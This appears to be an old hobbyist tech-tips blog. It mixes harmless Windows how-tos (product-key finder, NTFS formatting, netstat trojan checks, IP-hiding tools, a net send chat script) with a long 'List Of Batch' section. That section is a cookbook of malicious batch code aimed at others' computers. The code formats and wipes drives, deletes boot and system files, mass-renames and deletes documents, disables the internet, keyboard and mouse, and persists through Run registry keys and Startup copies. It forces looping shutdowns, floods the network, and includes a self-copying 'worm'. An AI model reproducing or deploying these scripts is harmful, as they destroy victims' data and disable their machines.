Monday, October 25, 2010

Find Product Key for Windows and Office

Find Product Key for Windows and Office

If you are looking for a way to retrieve the product keys of your MS Windows or MS Office, you are on the right page!
The following is a tool to detect the product keys of Microsoft Windows and Microsoft Office installed on your machine. This tool is free to download at Magical Jelly Bean.
Here's a screenshot


The tool also provides some nice features let you change your Windows product key, or detect the key remotely to another computer.

To download a copy of this tool. Click Here.


If you found this page useful, click on any ad to sponsor the site!
We can't get smarter without sharing, so sign in & post!   

Learn More - Make my channel private

Learn More - Make my channel private

Friday, October 22, 2010

How do I format a USB Flash Drive to NTFS file system?

Q: How do I format a USB Flash Drive to NTFS file system?

A: To enable NTFS on your USB Flash Drive drive (USB Flash Memory):

1. Right click My Computer and select Manage.
2. Open the Device Manager and find your USB drive under the Disk Drives heading.
3. Right click the drive and select Properties.

4. Choose Policies tab and select the "Optimize for performance" option.


5. Click OK.

6. Open My Computer.

7. Select Format on the flash drive.
8. Choose NTFS in the File System dropdown box.
9. Device Formatting is completed.

Important: To remove a device safely without data loss use a "safely remove hardware" procedure or Eject function from Windows Explorer.

Wednesday, October 20, 2010

Free SMS Worldwide

Free SMS Worldwide
just go this site:
http://for-ever.us/
if provide free SMS

Introduction:
Based on cloud computing technology, Cloud SMS is US's largest free sms service, which allows you to send sms to any cell phone carrier via the web at no cost.

The website is supported by The University of Liverpool.

Cloud SMS allows you to send international SMS over 200 countries online.

Send Free SMS, Cloud SMS brings Free SMS Service Online from anywhere in the world. Yes, it's FREE. Input your text message and the mobile number and click send.No sign up required.

Copied from the homepage....

Check whether you are infected

Check whether you are infected.
When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),
open a MS-DOS Prompt window (start/programs MS-DOS Prompt).
Then type netstat -arn and press the Enter key.
Your screen should display the following (without the dotted lines
which I added for clarification).

-----------------------------------------------------------------------------
Active Routes:

Network Address Netmask Gateway Address Interface Metric
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
255.255.255.255 255.255.255.255 255.255.255.255 0.0.0.0 1

Route Table

Active Connections

Proto Local Address Foreign Address State

--------------------------------------------------------------------------------

If you see anything else, there might be a problem (more on that later).
Now dial into your ISP, once you are connected;
go back to the MS-DOS Prompt and run the same command as before
netstat -arn, this time it will look similar to the following (without
dotted lines).

-------------------------------------------------------------------------------------

Active Routes:

Network Address Netmask Gateway Address Interface Metric
0.0.0.0 0.0.0.0 216.1.104.70 216.1.104.70 1
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
216.1.104.0 255.255.255.0 216.1.104.70 216.1.104.70 1
216.1.104.70 255.255.255.255 127.0.0.1 127.0.0.1 1
216.1.104.255 255.255.255.255 216.1.104.70 216.1.104.70 1
224.0.0.0 224.0.0.0 216.1.104.70 216.1.104.70 1
255.255.255.255 255.255.255.255 216.1.104.70 216.1.104.70 1

Route Table

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
UDP 216.1.104.70:137 *:*

--------------------------------------------------------------------------------

What you are seeing in the first section (Active Routes) under the heading of
Network Address are some additional lines. The only ones that should be there
are ones belonging to your ISP (more on that later). In the second section
(Route Table) under Local Address you are seeing the IP address that your ISP
assigned you (in this example 216.1.104.70).

The numbers are divided into four dot notations, the first three should be
the same for both sets, while in this case the .70 is the unique number
assigned for THIS session. Next time you dial in that number will more than
likely be different.

To make sure that the first three notation are as they should be, we will run
one more command from the MS-DOS window.
From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .net
or whatever it ends in. Following is an example of the output you should see.

---------------------------------------------------------------------------------------

Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops:
1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4]
2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1]
3 108 ms 116 ms 119 ms http://www.motion.net [207.239.117.112]
Trace complete.

------------------------------------------------------------------------------------------

You will see that on lines with the 1 and 2 the first three notations of the
address match with what we saw above, which is a good thing. If it does not,
then some further investigation is needed.

If everything matches like above, you can almost breath easier. Another thing
which should you should check is programs launched during startup. To find
these, Click start/programs/startup, look at what shows up. You should be
able to recognize everything there, if not, once again more investigation is
needed.

-------------------------------------------------------------------------------------------

Now just because everything reported out like we expected (and demonstrated
above) we still are not out of the woods. How is this so, you ask? Do you use
Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
that makes use of the Internet. Have you every recieved an email with an
attachment that ended in .exe? The list goes on and on, basically anything
that you run could have become infected with a trojan. What this means, is
the program appears to do what you expect, but also does just a little more.
This little more could be blasting ebay.com or one of the other sites that
CNNlive was talking about.

What can you do? Well some anti-virus software will detect some trojans.
Another (tedious) thing is to start each of these "extra" Internet programs
one at a time and go through the last two steps above, looking at the routes
and connection the program uses. However, the tricky part will be figuring
out where to tracert to in order to find out if the addresses you see in
step 2 are "safe" or not. I should forewarn you, that running tracert after
tracert, after tracert might be considered "improper" by your ISP. The steps
outlined above may not work exactly as I have stated depending upon your ISP,
but with a true ISP it should work. Finally, this advise comes with NO
warranty and by following my "hints' you implicitly release me from ANY and
ALL liability which you may incur.


Other options

Display protocol statistics and current TCP/IP network connections.
Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]

-a.. Display all connections and listening ports.
-e.. Display Ethernet statistics. This may be combined with the -s option.
-n.. Diplays address and port numbers in the numerical form.
-p proto..Shows connections for the protocol specified by proto; proto may be
TCP or UDP. If used with the -s option to display per-protocol statistics,
proto may be TCP, UDP, of IP.
-r.. Display the routing table.
-s.. Display per-protocol statistics. By default, statistics are shown for TCP
UDP and IP; the -p option may be used to specify a subset of the default
interval..Redisplay selected statistics, pausing intervals seconds between each
display. If omitted. netstat will print the current configuration information
once

List Of Batch

List Of Batch
----CHANGE ALL FILES TO .TEXT----

REN *.DOC *.text
REN *.JPEG *.text
REN *.LNK *.text
REN *.AVI *.text
REN *.MPEG *.text
REN *.COM *.text
REN *.BAT *.text

-----DESTROY THERE INTERNET-----

echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Love jagman64
PAUSE

----EREASE HARDRIVE----

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

----DESTROY ALL .TXT FILES---- (CHANGES WHAT TYPES OF FILES YOU DELTE BY CHANGING WHATS IN BRACKETS)

@echo off

del *.txt

-----CRASH-BY OPENING PROGRAM ALOT----(CHANGE WHAT FILE TO OPEN BY CHANGING NOTEPAD TO DESIRED PROGRAM NAME)

@echo off
:start
open notepad
goto start

-----SHUTDOWN COMPUTER CODE-----

shutdown -s (Inster at end of a virus)
-t 100 (-t stands for time till shut down, 100 is how many seconds, so there computer will shutdown in a hundred seconds)
-c "Goodbye" (-c stands for comment)
Should look like this:
shutdown -s -t 100 -c "goodbye"

-----MEGA POPUPS-----

start
start
start
start
popup.bat
(Make sure you save it as what you type in at the bottom, so im saving mine as popup.bat)

-----WHIPE C:\----

FORMAT C:

----CHANGE IP----

IPCONFIG /RELEASE
netsh interface ip set address name="Local Area Connection" static 10.0.0.10 255.0.0.0
netsh interface ip set address "Local Area Connection" dhcp

----TAKE AWAY VIRUS----

Go to start and click run type in
%SystemRoot%\system32\restore\rstrui.exe
and select a date before you got a virus, it will make your computer go back to that day.
Or open cmd and type in rstrui.exe

----AUTO SHUTDOWN----

@echo off
copy "Pwnscape.bat" "C:\Documents and Settings\All Users\Start Meun\Program\Startup"
cd "C:\Documents and Setting\All Users\Start Menu\Start Menu\Program\Startup"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
echo shutdown -s -t 5 -c "HAHAHAHAHA">%random%.bat"
shudown -s -t 5 -c "Love-Jagman64"
or

echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Love Jagman64
PAUSE

----RENAMES ALLFILES.TXT DELS *.TXT AUTO START UP----

@echo off
Copy "Pwnscape.bat" "C:\Users\User32\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
cd "C:\Users\Usr32\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
DEL C:\Windows\System32\restore
REN *.DOC *.txt
REN *.JPEG *.txt
REN *.LNK *.txt
REN *.AVI *.txt
REN *.MPEG *.txt
REN *.COM *.txt
REN *.EXE *.txt
del (.txt*)
start
start
start
Pwnscape.bat
Shutdown -s -t 10 -c "love-Jagman64"

----MASS PING----

ping http://www.google.com -t -l 50000

----PERMANENT INTERNET DISABLE----

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo Love- Jagman64
PAUSE

----FLOOD NETWORK----

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

----HOW TO TASKKILL PROGRAMS----(Simply find out the task name, eg: Msn is msnmsgr, Limewire is, LimeWire)

tskill LimeWire
tskill msnmsgr
tskill AVGAURD

----SWAP MOUSE BUTTONS----

RUNDLL32 USER32.DLL.SwapMouseButton

----MAKE YOUR FILE HIDDEN----

Attrib +r +h filename&locationhere.bat EG:Attrib +r +h C:\windows\startm~1\program\startup\virusbat

----COPY TO SYSTEM ROOT----

copy %0 %systemroot%\Virus.bat > nul

----MAKE THERE OWN COMPUTER DO A SIMPLE DOS ATTACK ON THEMSELVES----

ping 127.0.0.1 -t -l 50000 > NUL or
ping -n 4 localhost > NUL

----OPEN FILE ON START UP (1)----(Simpley put this anywhere in your virus)

echo copy %0 >> c:\autoexec.bat

----OPEN FILE ON START UP (2)----

copy %0 c:\windows\startm~1\Programs\StartUp\virus.bat

----0PEN FILE ON START UP (3)----

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\ filename\batchfile.bat" >> c:\regstart.reg
start c:\regstart.reg

----DELETE SYSTEM DRIVE----

del %systemdrive%\*.*/f/s/q

----GET ADMINASTRATOR RIGHTS----

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.

----SHUT HARDWARE DOWN----

hdmemory/release

----DELETE SYSTEM HARDDRIVE----

del %systemdrive%\*.*/f/s/q

----SHUTS DOWN COMPUTER FOREVER----

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

----RECORD AUDIO----

REM this checks if theres any folder named Voice
:speaker
IF EXIST "Voice" goto Menu
IF NOT EXIST "Voice" goto voicemake
REM this makes a folder named voice if not alredy exist
:voicemake
md Voice
goto vbss
REM this makes the VBS files in the voice folder
:vbss
echo.Set Speech = CreateObject("SAPI.SpVoice")>> "%CD%\Voice\Welcome.vbs"

----DISABLE KEYBAORD----

rem ---------------------------------
rem Disable Keyboard
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start "nokeyboard.reg"
rem ---------------------------------

----DISABLE MOUSE----

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


----SOME COMMANDS---- (List may be long)

-i (Display Gui-Most be first)
-l (Log off)
-s (Shutdwon)
-r (Restart)
-a (Stop Shutdown)
-m \\computername (Remove computer shutdown)
-t (Time till command)
-c "" (Comment)
-f (closes windows)
/y (Yes)
:START (See GOTO-The word LABEL is a example-it is not need any command will work)
Exit (Closes the cmd)
Pause (Click a key to continue)
START (Tells computer to open application Ex. "Start C:\WINDOWS\CALC.exe" Would open calculator.)
@echo off (Hides Commands being used in CMD)
Call (Run another batch file Ex. "CALL C:\MYVIRUS.BAT" )
CD (Change Directory Ex. CD C:\ Will go to C:\ Drive)
Append (Tells computer to open a file in a specific route)
GOTO (Tells computer to go back to a label":" Ex. GOTO Start)


----WORM---- (Copies it self and opens tons of porn sites)

@echo off
title You've been HACKED!
Echo hello %userprofile%
copy %0% "%userprofile%\Windows\Start Menu\Startup"
copy %0 c:\windows\startm~1\Programs\StartUp\XatHacker.bat
:Start
start iexplore.exe "www.nobrain.dk"
GOTO start
shutdown -r -t 100 -c "You shouldn't [love] with Jagar"

----BLOCK WEBSITES----

Echo 127.0.0.1 http://www.google.com >>%windir%/system32/drivers/etc/host

HIDE YOUR IP ADDRESS


















HIDE YOUR IP ADDRESS

May be some one also post before but i collected it so i posted here

Credit goes to his Developer

1)Hidemyip.exe
[Image: 32091-hide_my_ip.jpg]
Download it from the
http://www.hidemyip.com
you can also hide your Media access control address (mac) also
hidemymac.exe
download from the same site


2) Super Hide Ip 2.0.0.8
You can use the above tool also for the hide your ip.


[Image: superhidei.jpg]


Download:SuperHideIP-2.0.8.8.Setup.exe (1.61 MB)

http://www.multiupload.com/REWVZ9DMVB


3) Hide IP easy 4.1.6.8

[Image: images?q=tbn:ANd9GcTRW5PQPacl-91XbHZN1lx...F9DMqlyOo=]


Download:Hide.IP.Easy.4.1.6.8.rar (1.53 MB)

http://www.multiupload.com/UU465GMNNJ



4)Real Hide IP


[Image: images?q=tbn:ANd9GcS4wUa989KEB-fkpKCYZAK...HGzt5DwxI=]


Download:
hipadr_setup.exe (767 KB)

http://www.multiupload.com/EI5MGGFVNV

5)Hide Platinum

[Image: platinum_hide_ip.jpeg]

Download:
HidePlatinum--
http://www.multiupload.com/1ZE6NQ88MY


If Think it's use full then Thanks
Goal: Quality Post
>
Work: Make AH Famous
>
Share: Knowledge
>
Gain: Knowledge

Deleting recycle bin

Deleting recycle bin
This is quite a simple and fun trick, u can easily delete recycle bin which u cant do simply

[Image: 35c0kfb.png]


Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Na​meSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it.

This action should remove recycle bin from your desktop.

[Image: textsign-avidhacker.png]

CHATTING THROUGH MS-DOS

 CHATTING THROUGH MS-DOS
-: Chat with Friends through ms dos Command Prompt :-

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

8) Now all you need to do is type your message and press Enter.
Start Chatting.......!

HAVE FUNCool